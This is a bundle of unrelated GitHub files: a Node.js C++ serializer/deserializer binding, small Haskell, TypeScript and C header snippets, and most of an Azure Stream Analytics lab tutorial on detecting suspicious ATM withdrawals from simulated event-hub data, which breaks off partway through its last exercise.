env()->isolate()->ThrowException(error.ToLocalChecked());
}
Maybe<uint32_t> SerializerContext::GetSharedArrayBufferId(
Isolate* isolate, Local<SharedArrayBuffer> shared_array_buffer) {
Local<Value> args[1] = { shared_array_buffer };
Local<Value> get_shared_array_buffer_id =
object()->Get(env()->context(),
env()->get_shared_array_buffer_id_string())
.ToLocalChecked();
if (!get_shared_array_buffer_id->IsFunction()) {
return ValueSerializer::Delegate::GetSharedArrayBufferId(
isolate, shared_array_buffer);
}
MaybeLocal<Value> id =
get_shared_array_buffer_id.As<Function>()->Call(env()->context(),
object(),
arraysize(args),
args);
if (id.IsEmpty()) return Nothing<uint32_t>();
return id.ToLocalChecked()->Uint32Value(env()->context());
}
Maybe<bool> SerializerContext::WriteHostObject(Isolate* isolate,
Local<Object> input) {
MaybeLocal<Value> ret;
Local<Value> args[1] = { input };
Local<Value> write_host_object =
object()->Get(env()->context(),
env()->write_host_object_string()).ToLocalChecked();
if (!write_host_object->IsFunction()) {
return ValueSerializer::Delegate::WriteHostObject(isolate, input);
}
ret = write_host_object.As<Function>()->Call(env()->context(),
object(),
arraysize(args),
args);
if (ret.IsEmpty())
return Nothing<bool>();
return Just(true);
}
void SerializerContext::New(const FunctionCallbackInfo<Value>& args) {
Environment* env = Environment::GetCurrent(args);
new SerializerContext(env, args.This());
}
void SerializerContext::WriteHeader(const FunctionCallbackInfo<Value>& args) {
SerializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
ctx->serializer_.WriteHeader();
}
void SerializerContext::WriteValue(const FunctionCallbackInfo<Value>& args) {
SerializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
Maybe<bool> ret =
ctx->serializer_.WriteValue(ctx->env()->context(), args[0]);
if (ret.IsJust()) args.GetReturnValue().Set(ret.FromJust());
}
void SerializerContext::SetTreatArrayBufferViewsAsHostObjects(
const FunctionCallbackInfo<Value>& args) {
SerializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
bool value = args[0]->BooleanValue(ctx->env()->isolate());
ctx->serializer_.SetTreatArrayBufferViewsAsHostObjects(value);
}
void SerializerContext::ReleaseBuffer(const FunctionCallbackInfo<Value>& args) {
SerializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
// Note: Both ValueSerializer and this Buffer::New() variant use malloc()
// as the underlying allocator.
std::pair<uint8_t*, size_t> ret = ctx->serializer_.Release();
auto buf = Buffer::New(ctx->env(),
reinterpret_cast<char*>(ret.first),
ret.second);
if (!buf.IsEmpty()) {
args.GetReturnValue().Set(buf.ToLocalChecked());
}
}
void SerializerContext::TransferArrayBuffer(
const FunctionCallbackInfo<Value>& args) {
SerializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
Maybe<uint32_t> id = args[0]->Uint32Value(ctx->env()->context());
if (id.IsNothing()) return;
if (!args[1]->IsArrayBuffer())
return node::THROW_ERR_INVALID_ARG_TYPE(
ctx->env(), "arrayBuffer must be an ArrayBuffer");
Local<ArrayBuffer> ab = args[1].As<ArrayBuffer>();
ctx->serializer_.TransferArrayBuffer(id.FromJust(), ab);
return;
}
void SerializerContext::WriteUint32(const FunctionCallbackInfo<Value>& args) {
SerializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
Maybe<uint32_t> value = args[0]->Uint32Value(ctx->env()->context());
if (value.IsNothing()) return;
ctx->serializer_.WriteUint32(value.FromJust());
}
void SerializerContext::WriteUint64(const FunctionCallbackInfo<Value>& args) {
SerializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
Maybe<uint32_t> arg0 = args[0]->Uint32Value(ctx->env()->context());
Maybe<uint32_t> arg1 = args[1]->Uint32Value(ctx->env()->context());
if (arg0.IsNothing() || arg1.IsNothing())
return;
uint64_t hi = arg0.FromJust();
uint64_t lo = arg1.FromJust();
ctx->serializer_.WriteUint64((hi << 32) | lo);
}
void SerializerContext::WriteDouble(const FunctionCallbackInfo<Value>& args) {
SerializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
Maybe<double> value = args[0]->NumberValue(ctx->env()->context());
if (value.IsNothing()) return;
ctx->serializer_.WriteDouble(value.FromJust());
}
void SerializerContext::WriteRawBytes(const FunctionCallbackInfo<Value>& args) {
SerializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
if (!args[0]->IsArrayBufferView()) {
return node::THROW_ERR_INVALID_ARG_TYPE(
ctx->env(), "source must be a TypedArray or a DataView");
}
ArrayBufferViewContents<char> bytes(args[0]);
ctx->serializer_.WriteRawBytes(bytes.data(), bytes.length());
}
DeserializerContext::DeserializerContext(Environment* env,
Local<Object> wrap,
Local<Value> buffer)
: BaseObject(env, wrap),
data_(reinterpret_cast<const uint8_t*>(Buffer::Data(buffer))),
length_(Buffer::Length(buffer)),
deserializer_(env->isolate(), data_, length_, this) {
object()->Set(env->context(), env->buffer_string(), buffer).Check();
MakeWeak();
}
MaybeLocal<Object> DeserializerContext::ReadHostObject(Isolate* isolate) {
Local<Value> read_host_object =
object()->Get(env()->context(),
env()->read_host_object_string()).ToLocalChecked();
if (!read_host_object->IsFunction()) {
return ValueDeserializer::Delegate::ReadHostObject(isolate);
}
Isolate::AllowJavascriptExecutionScope allow_js(isolate);
MaybeLocal<Value> ret =
read_host_object.As<Function>()->Call(env()->context(),
object(),
0,
nullptr);
if (ret.IsEmpty())
return MaybeLocal<Object>();
Local<Value> return_value = ret.ToLocalChecked();
if (!return_value->IsObject()) {
env()->ThrowTypeError("readHostObject must return an object");
return MaybeLocal<Object>();
}
return return_value.As<Object>();
}
void DeserializerContext::New(const FunctionCallbackInfo<Value>& args) {
Environment* env = Environment::GetCurrent(args);
if (!args[0]->IsArrayBufferView()) {
return node::THROW_ERR_INVALID_ARG_TYPE(
env, "buffer must be a TypedArray or a DataView");
}
new DeserializerContext(env, args.This(), args[0]);
}
void DeserializerContext::ReadHeader(const FunctionCallbackInfo<Value>& args) {
DeserializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
Maybe<bool> ret = ctx->deserializer_.ReadHeader(ctx->env()->context());
if (ret.IsJust()) args.GetReturnValue().Set(ret.FromJust());
}
void DeserializerContext::ReadValue(const FunctionCallbackInfo<Value>& args) {
DeserializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
MaybeLocal<Value> ret = ctx->deserializer_.ReadValue(ctx->env()->context());
if (!ret.IsEmpty()) args.GetReturnValue().Set(ret.ToLocalChecked());
}
void DeserializerContext::TransferArrayBuffer(
const FunctionCallbackInfo<Value>& args) {
DeserializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
Maybe<uint32_t> id = args[0]->Uint32Value(ctx->env()->context());
if (id.IsNothing()) return;
if (args[1]->IsArrayBuffer()) {
Local<ArrayBuffer> ab = args[1].As<ArrayBuffer>();
ctx->deserializer_.TransferArrayBuffer(id.FromJust(), ab);
return;
}
if (args[1]->IsSharedArrayBuffer()) {
Local<SharedArrayBuffer> sab = args[1].As<SharedArrayBuffer>();
ctx->deserializer_.TransferSharedArrayBuffer(id.FromJust(), sab);
return;
}
return node::THROW_ERR_INVALID_ARG_TYPE(
ctx->env(), "arrayBuffer must be an ArrayBuffer or SharedArrayBuffer");
}
void DeserializerContext::GetWireFormatVersion(
const FunctionCallbackInfo<Value>& args) {
DeserializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
args.GetReturnValue().Set(ctx->deserializer_.GetWireFormatVersion());
}
void DeserializerContext::ReadUint32(const FunctionCallbackInfo<Value>& args) {
DeserializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
uint32_t value;
bool ok = ctx->deserializer_.ReadUint32(&value);
if (!ok) return ctx->env()->ThrowError("ReadUint32() failed");
return args.GetReturnValue().Set(value);
}
void DeserializerContext::ReadUint64(const FunctionCallbackInfo<Value>& args) {
DeserializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
uint64_t value;
bool ok = ctx->deserializer_.ReadUint64(&value);
if (!ok) return ctx->env()->ThrowError("ReadUint64() failed");
uint32_t hi = static_cast<uint32_t>(value >> 32);
uint32_t lo = static_cast<uint32_t>(value);
Isolate* isolate = ctx->env()->isolate();
Local<Value> ret[] = {
Integer::NewFromUnsigned(isolate, hi),
Integer::NewFromUnsigned(isolate, lo)
};
return args.GetReturnValue().Set(Array::New(isolate, ret, arraysize(ret)));
}
void DeserializerContext::ReadDouble(const FunctionCallbackInfo<Value>& args) {
DeserializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
double value;
bool ok = ctx->deserializer_.ReadDouble(&value);
if (!ok) return ctx->env()->ThrowError("ReadDouble() failed");
return args.GetReturnValue().Set(value);
}
void DeserializerContext::ReadRawBytes(
const FunctionCallbackInfo<Value>& args) {
DeserializerContext* ctx;
ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
Maybe<int64_t> length_arg = args[0]->IntegerValue(ctx->env()->context());
if (length_arg.IsNothing()) return;
size_t length = length_arg.FromJust();
const void* data;
bool ok = ctx->deserializer_.ReadRawBytes(length, &data);
if (!ok) return ctx->env()->ThrowError("ReadRawBytes() failed");
const uint8_t* position = reinterpret_cast<const uint8_t*>(data);
CHECK_GE(position, ctx->data_);
CHECK_LE(position + length, ctx->data_ + ctx->length_);
const uint32_t offset = position - ctx->data_;
CHECK_EQ(ctx->data_ + offset, position);
args.GetReturnValue().Set(offset);
}
void Initialize(Local<Object> target,
Local<Value> unused,
Local<Context> context,
void* priv) {
Environment* env = Environment::GetCurrent(context);
Local<FunctionTemplate> ser =
env->NewFunctionTemplate(SerializerContext::New);
ser->InstanceTemplate()->SetInternalFieldCount(
SerializerContext::kInternalFieldCount);
ser->Inherit(BaseObject::GetConstructorTemplate(env));
env->SetProtoMethod(ser, "writeHeader", SerializerContext::WriteHeader);
env->SetProtoMethod(ser, "writeValue", SerializerContext::WriteValue);
env->SetProtoMethod(ser, "releaseBuffer", SerializerContext::ReleaseBuffer);
env->SetProtoMethod(ser,
"transferArrayBuffer",
SerializerContext::TransferArrayBuffer);
env->SetProtoMethod(ser, "writeUint32", SerializerContext::WriteUint32);
env->SetProtoMethod(ser, "writeUint64", SerializerContext::WriteUint64);
env->SetProtoMethod(ser, "writeDouble", SerializerContext::WriteDouble);
env->SetProtoMethod(ser, "writeRawBytes", SerializerContext::WriteRawBytes);
env->SetProtoMethod(ser,
"_setTreatArrayBufferViewsAsHostObjects",
SerializerContext::SetTreatArrayBufferViewsAsHostObjects);
Local<String> serializerString =
FIXED_ONE_BYTE_STRING(env->isolate(), "Serializer");
ser->SetClassName(serializerString);
target->Set(env->context(),
serializerString,
ser->GetFunction(env->context()).ToLocalChecked()).Check();
Local<FunctionTemplate> des =
env->NewFunctionTemplate(DeserializerContext::New);
des->InstanceTemplate()->SetInternalFieldCount(
DeserializerContext::kInternalFieldCount);
des->Inherit(BaseObject::GetConstructorTemplate(env));
env->SetProtoMethod(des, "readHeader", DeserializerContext::ReadHeader);
env->SetProtoMethod(des, "readValue", DeserializerContext::ReadValue);
env->SetProtoMethod(des,
"getWireFormatVersion",
DeserializerContext::GetWireFormatVersion);
env->SetProtoMethod(des,
"transferArrayBuffer",
DeserializerContext::TransferArrayBuffer);
env->SetProtoMethod(des, "readUint32", DeserializerContext::ReadUint32);
env->SetProtoMethod(des, "readUint64", DeserializerContext::ReadUint64);
env->SetProtoMethod(des, "readDouble", DeserializerContext::ReadDouble);
env->SetProtoMethod(des, "_readRawBytes", DeserializerContext::ReadRawBytes);
Local<String> deserializerString =
FIXED_ONE_BYTE_STRING(env->isolate(), "Deserializer");
des->SetClassName(deserializerString);
target->Set(env->context(),
deserializerString,
des->GetFunction(env->context()).ToLocalChecked()).Check();
}
} // anonymous namespace
} // namespace node
NODE_MODULE_CONTEXT_AWARE_INTERNAL(serdes, node::Initialize)
| {
"pile_set_name": "Github"
} |
-- file: ch24/MVarExample.hs
import Control.Concurrent
communicate = do
m <- newEmptyMVar
forkIO $ do
v <- takeMVar m
putStrLn ("received " ++ show v)
putStrLn "sending"
putMVar m "wake up!" | {
"pile_set_name": "Github"
} |
/**
* Convert object keys to camel case
*/
declare function toCamelCase<T extends {}, S extends {}>(obj: T, ignored?: string[]): S;
export = toCamelCase; | {
"pile_set_name": "Github"
} |
#ifndef __USBAUDIO_DEBUG_H
#define __USBAUDIO_DEBUG_H
/*
* h/w constraints
*/
#ifdef HW_CONST_DEBUG
#define hwc_debug(fmt, args...) printk(KERN_DEBUG fmt, ##args)
#else
#define hwc_debug(fmt, args...) do { } while(0)
#endif
#endif /* __USBAUDIO_DEBUG_H */
| {
"pile_set_name": "Github"
} |
<a name="HOLTitle"></a>
# Analyzing Data in Real Time with Azure Stream Analytics #
[Azure Stream Analytics](https://azure.microsoft.com/services/stream-analytics/) is a cloud-based service for ingesting high-velocity data streaming from devices, sensors, applications, Web sites, and other data sources and analyzing that data in real time. It supports a [SQL-like query language](https://msdn.microsoft.com/library/azure/dn834998.aspx) that works over dynamic data streams and makes analyzing constantly changing data no more difficult than performing queries on static data stored in traditional databases. With Azure Stream Analytics, you can set up jobs that analyze incoming data for anomalies or information of interest and record the results, present notifications on dashboards, or even fire off alerts to mobile devices. And all of it can be done at low cost and with a minimum of effort.
Scenarios for the application of real-time data analytics are legion and include fraud detection, identity-theft protection, optimizing the allocation of resources (think of an Uber-like transportation service that sends drivers to areas of increasing demand *before* that demand peaks), click-stream analysis on Web sites, shopping suggestions on retail-sales sites, and countless others. Having the ability to process data *as it comes in* rather than waiting until after it has been aggregated offers a competitive advantage to businesses that are agile enough to make adjustments on the fly.
In this lab, you'll create an Azure Stream Analytics job and use it to analyze data streaming in from simulated Internet of Things (IoT) devices. And you will see how simple it is to monitor real-time data streams for information of significance to your research or business.
<a name="Objectives"></a>
### Objectives ###
In this hands-on lab, you will learn how to:
- Create an Azure event hub and use it as a Stream Analytics input
- Create a Stream Analytics job and test queries on sample data streams
- Run a Stream Analytics job and perform queries on live data streams
- Store Stream Analytics output in Azure storage blobs
<a name="Prerequisites"></a>
### Prerequisites ###
The following is required to complete this hands-on lab:
- An active Microsoft Azure subscription. If you don't have one, [sign up for a free trial](http://aka.ms/WATK-FreeTrial).
- [Node.js](https://nodejs.org)
<a name="Resources"></a>
### Resources ###
[Click here](https://a4r.blob.core.windows.net/public/stream-analytics-resources.zip) to download a zip file containing the resources used in this lab. Copy the contents of the zip file into a folder on your hard disk.
<a name="Cost"></a>
### Cost ###

The cost of this lab is **low**. For an overview of cost ratings, refer to [Explanation of Costs](../../Costs.md).
<a name="Exercises"></a>
## Exercises ##
This hands-on lab includes the following exercises:
- [Exercise 1: Create an event hub](#Exercise1)
- [Exercise 2: Create a shared-access signature token](#Exercise2)
- [Exercise 3: Send events to the event hub](#Exercise3)
- [Exercise 4: Create a Stream Analytics job](#Exercise4)
- [Exercise 5: Prepare queries and test with sample data](#Exercise5)
- [Exercise 6: Analyze a live data stream](#Exercise6)
Estimated time to complete this lab: **60** minutes.
<a name="Exercise1"></a>
## Exercise 1: Create an event hub ##
Azure Stream Analytics supports several types of input, including input from Azure blobs and input from Azure event hubs. Of the two, the latter is typically more interesting because in the IoT world, data is easily transmitted to Azure event hubs through field gateways (for devices that are not IP-capable) or cloud gateways (for devices that *are* IP-capable), and a single Azure event hub can handle millions of events per second transmitted from devices spread throughout the world.
In this exercise, you'll create an Azure event hub to provide input to Azure Stream Analytics and configure it to so that it can be accessed safely and securely by IoT devices and gateways.
1. In your browser, navigate to the [Azure Portal](https://portal.azure.com). If you are asked to sign in, do so using your Microsoft account.
1. In the portal, click **+ Create a resource**, followed by **Internet of Things** and **Event Hubs**.

_Adding a new event hub_
1. Type a namespace name into the **Name** box. The name must be unique within Azure, so you will probably have to use something other than the name in the screen shot below. (A green check mark will appear in the box when the name you've entered is one that Azure will accept.) Select **Create new** under **Resource group** and enter the resource-group name "StreamAnalyticsResourceGroup" (without quotation marks). Choose the region closest to you in the **Location** drop-down, and then click the **Create** button.

_Creating a namespace_
1. Click **Resource groups** in the ribbon on the left, and then click the "StreamAnalyticsResourceGroup" resource group created in the previous step.

_Opening the resource group_
1. Wait until "Deploying" changes to "Succeeded." (You can click the **Refresh** button at the top of the blade to refresh the deployment status.) Then click the namespace whose name you specified in Step 3.

_Opening the namespace_
1. Click **+ Event Hub** to add an event hub to the namespace.

_Adding an event hub_
1. Type "inputhub" (without quotation marks) into the **Name** box. Then click the **Create** button.

_Creating an event hub_
1. Wait a moment for the event hub to be created. Then scroll to the bottom of the blade and click the event hub name.

_Opening the event hub_
1. In order to transmit events to the event hub from an application or device, you need to create a shared-access policy that includes Send permission. To begin, click **Shared access policies**, and then click **+ Add**.

_Adding a shared-access policy_
1. Type "SendPolicy" (without quotation marks) into the **Policy name** box and check the **Send** box. Then click the **Create** button to create the new policy.

_Creating a send policy_
1. Wait a moment for **SendPolicy** to appear in the policies list, and then click it.

_Opening the policy_
1. Click the **Copy** button to the right of the **Primary key** box to copy the policy's shared-access key to the clipboard. Then temporarily save the key by pasting it into your favorite text editor. You'll need it in the next exercise.

_Copying the primary key to the clipboard_
You have created an event hub that can ingest events and be used as the source of input to a Stream Analytics job. You have also created a policy that allows holders of that policy to send events to the event hub. The next step is to generate a security token that can be used to authenticate calls to the event hub.
<a name="Exercise2"></a>
## Exercise 2: Create a shared-access signature token ##
Applications, devices, or gateways can send events to event hubs using the [Azure Event Hubs REST API](https://msdn.microsoft.com/en-us/library/azure/Dn790674.aspx). Each request transmitted via this API must include a valid [shared-access signature (SAS)](https://azure.microsoft.com/en-us/documentation/articles/service-bus-shared-access-signature-authentication/) token in the HTTP Authorization header. SAS tokens are generated from the event hub's URL and the primary key for the policy used to communicate with the event hub — in this case, the policy named "SendPolicy" that you created in the previous exercise.
In this exercise, you will generate a shared-access signature token for the event hub created in [Exercise 1](#Exercise1) and copy it, along with the event hub URL, into a Node.js application that will be used to send events to the event hub in Exercise 3. The Azure Portal doesn't provide an interface for generating SAS tokens, so you will generate a token using a Node.js app named sas.js provided with this lab.
1. If Node.js isn't installed on your computer, go to https://nodejs.org and install it now.
> You can find out whether Node.js is installed on your computer by executing a **node -v** command in a Command Prompt window or terminal window. If Node.js is installed, you will see the Node.js version number.
1. Open a Command Prompt window or terminal window and in it, navigate to the directory where you copied the [resources that accompany this lab](https://a4r.blob.core.windows.net/public/stream-analytics-resources.zip). Then execute the following commands to install the packages used by the Node.js apps in that directory:
```
npm install shared-access-signature
npm install request
```
> It is very important that you run these commands in the directory that you copied the lab resources to so the packages will be installed in the same directory as the Node apps that use them.
1. Now execute the following command to run sas.js:
```
node sas.js
```
1. When prompted for the event-hub URL, enter the text below, replacing *namespace* with the namespace name you entered in Exercise 1, Step 3. Then press Enter.
<pre>
https://<i>namespace</i>.servicebus.windows.net/inputhub</pre>
> This assumes that you named the event hub "inputhub" as directed in Exercise 1, Step 7. If you chose another name, substitute that name for "inputhub" in the event-hub URL.
1. When prompted, enter the name of the policy (SendPolicy) you created for the Azure event hub in Exercise 1, Step 10. Then press Enter.
1. When prompted, enter the policy key that you saved in Exercise 1, Step 12. Then press Enter.
1. The SAS token, which is highlighted with the red box below, will be output to the Command Prompt or terminal window. Select it and copy it to the clipboard.

_Copying the SAS token_
1. Find the file named **eventgen.js** in the directory containing the lab resources and open it in your favorite text editor. Then find the section at the top of the file labeled "KEY VARS:"
```JavaScript
///////////////// KEY VARS /////////////////
var sas = "Token";
var uri = "URL";
///////////////////////////////////////////
```
1. Replace *Token* with the SAS token you copied to the clipboard in Step 7. **Important:** The SAS token must **not include line breaks**. It needs to appear on this line as one contiguous string, and it must begin and end with quotation marks. In addition, the line must end with a semicolon.
1. Replace *URL* with the event-hub URL you entered in Step 4.
1. Save the modified eventgen.js file. The modified "KEY VARS" section should look something like this:
```JavaScript
///////////////// KEY VARS /////////////////
var sas = "SharedAccessSignature sr=https%3A%2F%2Fstream-analytics-lab.servicebus.windows.net%2Finputhub&sig=Rz5dVs73XQkUU8KUcrLivDU4Q7%2Bg8zogdApBZHak480%3D&se=1515170996.004&skn=SendPolicy";
var uri = "https://stream-analytics-lab.servicebus.windows.net/inputhub";
///////////////////////////////////////////
```
Now that you've modified eventgen.js with information specific to your event hub, it's time to generate some events.
<a name="Exercise3"></a>
## Exercise 3: Send events to the event hub ##
In this exercise, you will send events to the event hub you created in [Exercise 1](#Exercise1). To do that, you'll use Node.js to run eventgen.js, which in turn transmits secure requests to the event hub using the [Azure Event Hubs REST API](https://msdn.microsoft.com/en-us/library/azure/Dn790674.aspx). eventgen.js generates events representing withdrawals from simulated ATM machines. Each event contains relevant information such as the card number used for the withdrawal, the time and amount of the withdrawal, and a unique identifier for the ATM machine used.
1. At the command prompt or in a terminal window, navigate to the directory containing the lab resources. Then execute the following command:
```
node eventgen.js
```
You should see output similar to the following. Each line represents one event sent to the event hub, and events will probably roll by at a rate of about 2 to 3 per second. (Rates will vary depending on your connection speed.) **Confirm that each request returns the HTTP status code 201**. This indicates that the event hub received and accepted the request. If you receive any other status code — for example, 401 — then the SAS token probably isn't valid and you need to repeat [Exercise 2](#Exercise2).
```
[1000] Event sent (status code: 201)
[1001] Event sent (status code: 201)
[1002] Event sent (status code: 201)
[1003] Event sent (status code: 201)
[1004] Event sent (status code: 201)
[1005] Event sent (status code: 201)
[1006] Event sent (status code: 201)
[1007] Event sent (status code: 201)
[1008] Event sent (status code: 201)
[1009] Event sent (status code: 201)
```
1. After 10 to 20 events have been sent, press Ctrl+C (or whatever key combination your operating system supports for terminating an application running in a terminal window) to stop the flow of events. **Leave the Command Prompt or terminal window open so you can return to it later.**
Now that events are flowing to your event hub, the next step is to create a Stream Analytics job and connect it to the event hub.
<a name="Exercise4"></a>
## Exercise 4: Create a Stream Analytics job ##
In this exercise, you will use the Azure Portal to create a Stream Analytics job and connect it to the event hub you created in [Exercise 1](#Exercise1). You will also capture the raw data being passed to the Stream Analytics job from the event hub and examine its structure.
1. Return to the [Azure Portal](https://portal.azure.com) and click **+ Create a resource**, followed by **Internet of Things** and **Stream Analytics job**.

_Creating a Stream Analytics job_
1. Type "ATMAnalytics" (without quotation marks) into the **Job name** box. Select **Use Existing** under **Resource group** and select the "StreamAnalyticsResourceGroup" resource group that you created in [Exercise 1](#Exercise1). Select the region nearest you for **Location**. (It is important to select the same region that you selected for the event hub in Exercise 1, because you're not charged for data that moves within a data center, but you typically *are* charged for data that moves *between* data centers. In addition, locating services that talk to each other in the same data center reduces latency.) Then click the **Create** button.

_Specifying parameters for the Stream Analytics job_
1. Click **Resource groups** in the ribbon on the left, and then click the "StreamAnalyticsResourceGroup" resource group.

_Opening the resource group_
1. Click **ATMAnalytics** to open the Stream Analytics job in the portal.

_Opening the Stream Analytics job_
1. Click **Inputs** to add an input to the Stream Analytics job.

_Adding an input_
1. Click **+ Add**.

_Adding an input_
1. Type "Withdrawals" (without quotation marks) into the **Input alias** box. Make sure **Source Type** is set to **Data stream** and **Source** is set to **Event hub**. Select the service-bus namespace and event hub ("inputhub") you created in [Exercise 1](#Exercise1). Then select **RootManageSharedAccessKey** from the **Event hub policy name** drop-down and click the **Create** button at the bottom of the blade.

_Creating an input_
1. After a few moments, the new input — "Withdrawals" — appears in the list of inputs for the Stream Analytics job. Click it to open a blade for it.

_Opening the input_
1. Go back to the Command Prompt or terminal window you left open at the end of the previous exercise and run eventgen.js again by executing the following command:
```
node eventgen.js
```
1. With eventgen.js still running, return to the Azure Portal open in your browser and click **Sample Data**.

_Sampling input data_
1. Click **OK** to begin sampling data from the input stream.

_Specifying sampling parameters_
1. Wait a few seconds for sampling to complete, and when you are notified that the sample data can be downloaded, click to download it.

_Data sampling completed_
1. Click **Download** to download the data sampled from the input stream.

_Downloading sample data_
1. Save the JSON file that is downloaded to a location where you can easily find it. Then open the downloaded file in your favorite text editor and take a moment to examine its contents. How many rows (events) are represented in the sample data? What is the structure of each row — that is, what fields does each row contain?
> If you find the output hard to digest since there are no line breaks, try pasting it into an online JSON viewer such as the one at https://jsonformatter.curiousconcept.com/.
1. Return to the Command Prompt or terminal window in which eventgen.js is running and press Ctrl+C (or the equivalent) to stop it.
You have connected a Stream Analytics job to an event hub and demonstrated that data is passed from one to the other. You have also sampled the data input to the Stream Analytics job and examined its structure. The next step is to do something with it — specifically, to bring the power of Azure Stream Analytics to bear on the data.
<a name="Exercise5"></a>
## Exercise 5: Prepare queries and test with sample data ##
Now that your job is set up, there's much more you can do with Stream Analytics than simply view the raw data presented to it. The whole point of Stream Analytics is being able to query real-time data streams. In this exercise, you will use the [Stream Analytics Query Language](https://msdn.microsoft.com/en-us/library/azure/Dn834998.aspx) to query a sample data set for potentially fraudulent ATM transactions. It is always a good idea to test your queries against sample data before deploying them against live data streams, because with sample data, you can verify that a known set of inputs produces the expected outputs.
To flag potentially fraudulent withdrawals from ATMs, you will query for transactions performed with the same ATM card at different ATM machines within a specified time window (60 seconds). In real life, you would probably use a larger time window and perhaps even factor in the distance between ATM machines. However, a narrower time window is useful in a lab environment because it allows you to perform meaningful experiments in minutes rather than hours.
1. Begin by returning to the Stream Analytics job in the portal and clicking **Query**.

_Opening the query viewer_
1. Click the **ellipsis** (the three dots) to the right of **Withdrawals** and select **Upload sample data from file** from the menu.

_Uploading sample data for testing queries_
1. Click the **folder** icon on the right and select the file named **Withdrawals.json** from the lab resources. Then click **OK** to upload the file.
> The reason you're using a file provided for you (rather than the one you captured in the previous exercise) is to make sure everyone gets the same results. eventgen.js uses JavaScript's Math.random() function to randomize results, and Math.random() does not produce repeatable sequences of pseudo-random numbers.

_Uploading Withdrawals.json_
1. When the upload is complete, enter the following query, and then click the **Test** button to execute it against the sample data you uploaded:
```sql
SELECT * FROM Withdrawals
```
> Where did the name "Withdrawals" come from? That's the alias you assigned to the event-hub input in the previous exercise. If you named it differently, you'll need to replace "Withdrawals" with the alias you used.

_Testing a query_
1. Confirm that you see the output pictured below. The test data contains 607 rows. Each row has fields named TRANSACTIONID, TRANSACTIONTIME, DEVICEID, CARDNUMBER, and AMOUNT. DEVICEID is the ID of the ATM machine at which the transaction took place. AMOUNT is the amount of cash withdrawn from the ATM.

_Query results_
1. Suppose you only wanted to view transactions for amounts between 200 and 300, inclusive. Furthermore, suppose you wanted to clean up the output by assigning your own column names and excluding the TRANSACTIONID column. Enter the following query and click **Test** again to execute it.
```sql
SELECT TransactionTime as [Time of Transaction],
DeviceID as [ATM],
CardNumber as [Card Number],
Amount as [Amount]
FROM Withdrawals
WHERE Amount >= 200 and Amount <= 300
```
1. Confirm that the query generated the following output:

_Customizing the output_
1. One of the key features of the Stream Analytics Query Language is its ability to group results using windows of time whose length you specify. To demonstrate, enter the following query to count the number of transactions taking place each minute and click **Test** to execute it:
```sql
SELECT System.Timestamp as [Time Ending],
COUNT(*) AS [Number of Transactions]
FROM Withdrawals TIMESTAMP BY TransactionTime
GROUP BY TumblingWindow(n, 1)
```
> TIMESTAMP BY is an important element of the Stream Analytics Query Language. If it was omitted from the query above, you would be querying for the number of transactions that arrived *at the event hub* each minute rather than the number of transactions that occurred in each 1-minute interval. TIMESTAMP BY allows you to specify a field in the input stream as the event time.
1. Confirm that you see the output below:

_Querying for the number of transactions per minute_
1. Now it's time to query the test data for potentially fraudulent transactions — transactions involving the same ATM card but different ATM machines that take place within 60 seconds of each other. *This is the query you will use in the next exercise against a live data stream*.
Enter the following query and click **Test** to execute it:
```sql
SELECT W1.CardNumber as [Card Number],
W1.DeviceID as [ATM 1], W2.DeviceID as [ATM 2],
W1.TransactionTime as [Time 1], W2.TransactionTime as [Time 2]
FROM Withdrawals W1 TIMESTAMP BY TransactionTime
JOIN Withdrawals W2 TIMESTAMP BY TransactionTime
ON W1.CardNumber = W2.CardNumber
AND DATEDIFF(ss, W1, W2) BETWEEN 0 and 60
WHERE W1.DeviceID != W2.DeviceID
```
1. This time the output should contain just three rows, each representing two transactions performed with one ATM card at two different locations within 60 seconds of each other:

_Detecting potentially fraudulent transactions_
1. Click the **Save** button at the top of the blade to save the query. Then click **Yes** when asked to confirm.

_Saving the query_
With the query now formulated, tested against a set of sample data, and saved, it's time to deploy it against a live data stream to produce a running record of potentially fraudulent transactions.
<a name="Exercise6"></a>
## Exercise 6: Analyze a live data stream ##
Being able to run your queries and see the results in the portal is great for testing, but when Azure Stream Analytics is deployed against a live data stream, you need to specify a destination (or destinations) for the output. Stream Analytics supports a variety of output types, including blobs, Azure SQL databases, and even event hubs. One motivation for using blob storage is to create a persistent record from the output.
In this exercise, you will create a storage account and configure the Stream Analytics job to store output in blob storage. Then you will run the job against a live data stream and check the results by inspecting blob storage.
1. Return to the Azure Portal and click **+ Create a resource** in the ribbon on the left. Then click **Storage**, followed by **Storage account**.

_Adding a storage account_
1. In the ensuing blade, enter a unique name for the new storage account and make sure a green check mark appears next to it. Select **Use existing** under **Resource group** and select the resource group named "StreamAnalyticsResourceGroup" so the storage account will belong to the same resource group as the Stream Analytics job and the event hub. Select the same **Location** you selected in previous exercises. Then click the **Create** button at the bottom of the blade.
> Storage account names must be 3 to 24 characters in length and can only contain numbers and lowercase letters. In addition, the name you enter must be unique within Azure.

_Creating a storage account_
1. Click **Resource groups** in the ribbon on the left, and then click the "StreamAnalyticsResourceGroup" resource group.

_Opening the resource group_
1. Click **ATMAnalytics** to open the Stream Analytics job in the portal.

_Opening the Stream Analytics job_
1. Click **Outputs**.

_Adding an output_
1. Click **+ Add**.

_Adding an output_
